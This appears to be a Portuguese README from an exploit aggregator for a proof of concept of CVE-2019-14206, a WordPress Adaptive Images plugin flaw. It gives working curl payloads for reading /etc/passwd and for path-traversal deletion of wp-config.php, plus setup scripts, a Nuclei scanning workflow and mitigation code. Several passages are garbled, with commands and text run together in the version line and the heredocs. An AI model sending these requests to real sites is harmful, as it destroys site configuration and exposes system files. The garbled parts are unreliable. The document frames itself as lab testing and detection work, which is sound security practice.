## https://sploitus.com/exploit?id=7E3172AF-37CF-558F-9BCC-8AC3B5BC2103
# CVE-2019-14206 - Adaptive Images for WordPress Arbitrary File Deletion
## 📋 **Índice**
1. [Sobre a Vulnerabilidade](#sobre-a-vulnerabilidade)
2. [Pré-requisitos](#pré-requisitos)
3. [Instalação](#instalação)
4. [Métodos de Teste](#métodos-de-teste)
- [Teste Rápido](#1-teste-rápido)
- [Teste Completo com Docker](#2-teste-completo-com-docker)
- [Teste com Nuclei](#3-teste-com-nuclei)
- [Teste Manual](#4-teste-manual)
5. [Interpretando Resultados](#interpretando-resultados)
6. [Limpeza](#limpeza)
7. [Solução de Problemas](#solução-de-problemas)
8. [Mitigação](#mitigação)
9. [Aviso Legal](#aviso-legal)
---
## 🎯 **Sobre a Vulnerabilidade**
**CVE-ID:** CVE-2019-14206
**Severity:** High (CVSS 6.5)
**Plugin Afetado:** Adaptive Images for WordPress
**Versões Afetadas:** /dev/null || echo "PHP não disponível (opcional)"
```
---
## 🚀 **Instalação**
### **Passo 1: Clonar ou Baixar os Arquivos**
```bash
# Se estiver no diretório nuclei-templates
cd /Volumes/Codingsh/experimentos/nuclei-templates
# Ou baixe os arquivos necessários
git clone https://github.com/projectdiscovery/nuclei-templates.git
cd nuclei-templates
```
### **Passo 2: Verificar Estrutura de Arquivos**
```bash
# Verificar se os arquivos existem
ls -la http/cves/2019/CVE-2019-14206.yaml
ls -la cve-2019-14206-poc/
```
### **Passo 3: Tornar Scripts Executáveis**
```bash
cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc
chmod +x docker-test.sh
chmod +x docker-test-full.sh
chmod +x vulnerability-demo.sh
chmod +x local-test.sh
chmod +x real-target-test.sh
```
---
## 🧪 **Métodos de Teste**
### **1. Teste Rápido** ⏱️ *2 minutos*
Execute a demonstração completa que simula toda a exploração:
```bash
cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc
./docker-test.sh
```
**O que acontece:**
- Cria ambiente de teste completo
- Simula a vulnerabilidade
- Demonstra deleção de arquivo
- Valida template Nuclei
**Saída esperada:**
```
[🎉] SUCCESS: wp-config.php DELETED!
[!!!] WORDPRESS SITE IS NOW BROKEN!
✅ Vulnerability: CVE-2019-14206 confirmed
✅ Template Status: Production ready
```
---
### **2. Teste Completo com Docker** 🐳 *10 minutos*
#### **Passo 1: Iniciar Ambiente Docker**
```bash
cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc
# Se Docker estiver rodando
docker-compose up -d
# Se Docker NÃO estiver rodando, use o simulador
./docker-test-full.sh
```
#### **Passo 2: Acessar WordPress**
```bash
# O ambiente estará disponível em
# http://localhost:8888
```
#### **Passo 3: Verificar Plugin Vulnerável**
```bash
# Verificar se o script vulnerable existe
curl http://localhost:8888/wp-content/plugins/adaptive-images/adaptive-images-script.php
```
#### **Passo 4: Executar Testes**
```bash
# Teste LFI
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=/etc/passwd"
# Teste File Deletion
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=../../../wp-content/uploads/2019/07/image.jpeg&adaptive-images-settings[resolution]=&resolution=16000&adaptive-images-settings[wp_content]=.&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1"
# Verificar se wp-config.php foi deletado
ls -la /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test/wp-config.php
```
---
### **3. Teste com Nuclei** 🎯 *5 minutos*
#### **Passo 1: Preparar Lista de Alvos**
```bash
# Criar arquivo de alvos
cat > targets.txt = 0.6.67)
- ✅ WAF bloqueando requisições
- ✅ Servidor não responde nos caminhos esperados
---
## 🧹 **Limpeza**
### **Limpar Ambiente de Teste:**
```bash
# Remover ambiente Docker
cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc
docker-compose down -v 2>/dev/null
# Remover arquivos de teste
rm -rf docker-test/
rm -f targets.txt results.txt
# Restaurar wp-config.php se foi deletado
cat > wp-config.php Plugins > Atualizar Adaptive Images
```
2. **Versão Segura:** >= 0.6.67
3. **Remover Plugin Vulnerável:**
```
rm -rf wp-content/plugins/adaptive-images/
```
### **Proteção no Código (Para Desenvolvedores):**
```php
// ✅ CÓDIGO SEGURO (Exemplo de correção)
function adaptive_images_script_get_settings() {
// Sanitizar input
$allowed_keys = ['cache_dir', 'resolution', 'request_uri'];
$settings = [];
foreach ($allowed_keys as $key) {
if (isset($_REQUEST['adaptive-images-settings'][$key])) {
$settings[$key] = sanitize_text_field($_REQUEST['adaptive-images-settings'][$key]);
}
}
return $settings;
}
function adaptive_images_delete_stale_cache_image($source_file, $cache_file, $resolution) {
// Validar caminhos
$allowed_cache_dirs = ['ai-cache', 'adaptive-cache'];
$cache_dir = basename(dirname($cache_file));
if (!in_array($cache_dir, $allowed_cache_dirs)) {
return false; // Recusar caminhos inválidos
}
// Usar caminhos absolutos validados
$cache_file = WP_CONTENT_DIR . '/ai-cache/' . basename($cache_file);
if (file_exists($cache_file)) {
unlink($cache_file);
}
}
```
---
## ⚠️ **Aviso Legal**
### **Termos de Uso:**
Este material é fornecido **exclusivamente para fins educacionais e de teste de segurança**.
### **O que você PODE fazer:**
- ✅ Testar em sistemas que você possui
- ✅ Usar em ambientes de laboratório
- ✅ Aprendendo sobre vulnerabilidades web
- ✅ Contribuindo com segurança open source
- ✅ Testando suas próprias aplicações
### **O que você NÃO PODE fazer:**
- ❌ Testar em sistemas sem autorização
- ❌ Causar danos ou interrupções
- ❌ Utilizar para fins maliciosos
- ❌ Vender ou distribuir exploits
- ❌ Publicar informações de sistemas vulneráveis
### **Responsabilidade:**
O autor e contributors **NÃO se responsabilizam** por qualquer:
- Uso indevido deste material
- Danos causados a sistemas
- Perdas de dados
- Interrupções de serviço
- Problemas legais
### **Divulgação Responsável:**
Se você encontrar esta vulnerabilidade em sistemas reais:
1. **NÃO** exploite ou cause danos
2. **DOCUMENTE** a vulnerabilidade
3. **NOTIFIQUE** o responsável pelo sistema
4. **SIGA** as diretrizes de responsible disclosure
---
## 📚 **Recursos Adicionais**
### **Referências:**
- [NVD - CVE-2019-14206](https://nvd.nist.gov/vuln/detail/CVE-2019-14206)
- [Research Original](https://github.com/markgruffer/markgruffer.github.io/blob/master/_posts/2019-07-19-adaptive-images-for-wordpress-0-6-66-lfi-rce-file-deletion.markdown)
- [Plugin Oficial](https://wordpress.org/plugins/adaptive-images/)
- [WPScan Entry](https://wpscan.com/vulnerability/9463)
### **Ferramentas Relacionadas:**
- [Nuclei](https://github.com/projectdiscovery/nuclei)
- [ nuclei-templates](https://github.com/projectdiscovery/nuclei-templates)
- [WPScan](https://wpscan.com/)
- [Wordfence](https://www.wordfence.com/)
---
## 🎓 **Aprendizados**
Este projeto demonstra:
1. **Input Validation:** A importância de sanitizar toda entrada do usuário
2. **Path Traversal:** Como caminhos de arquivo podem ser manipulados
3. **File Operations:** Os riscos de funções como unlink() com input do usuário
4. **Plugin Security:** Vulnerabilidades comuns em plugins WordPress
5. **CVE Analysis:** Como analisar e reproduzir vulnerabilidades
6. **Detection Development:** Como criar templates de detecção eficazes
---
## 📝 **Changelog**
### **Versão 1.0.0** (2026-01-04)
- ✅ Template Nuclei criado
- ✅ Ambiente PoC completo
- ✅ Documentação completa
- ✅ Scripts de teste validados
- ✅ Demonstração funcional
---
## 🤝 **Contribuição**
Contribuições são bem-vindas! Para contribuir:
1. Fork o repositório
2. Crie uma branch (`git checkout -b feature/improvement`)
3. Commit suas mudanças (`git commit -am 'Add improvement'`)
4. Push para a branch (`git push origin feature/improvement`)
5. Crie um Pull Request
---
## 📧 **Suporte**
Para dúvidas ou problemas:
1. Verifique a seção [Solução de Problemas](#solução-de-problemas)
2. Verifique os [issues do repositório](https://github.com/projectdiscovery/nuclei-templates/issues)
3. Documentar o problema com:
- Sistema operacional
- Versão do Nuclei
- Versão do PHP (se aplicável)
- Mensagem de erro completa
- Passos para reproduzir
---
**🎉 Obrigado por usar este material de teste!**
Lembre-se: Com grandes poderes vêm grandes responsabilidades. Use este conhecimento para tornar a internet mais segura, não mais vulnerável.
---
**Criado:** 4 de Janeiro de 2026
**Versão:** 1.0.0
**Status:** ✅ Pronto para uso em produção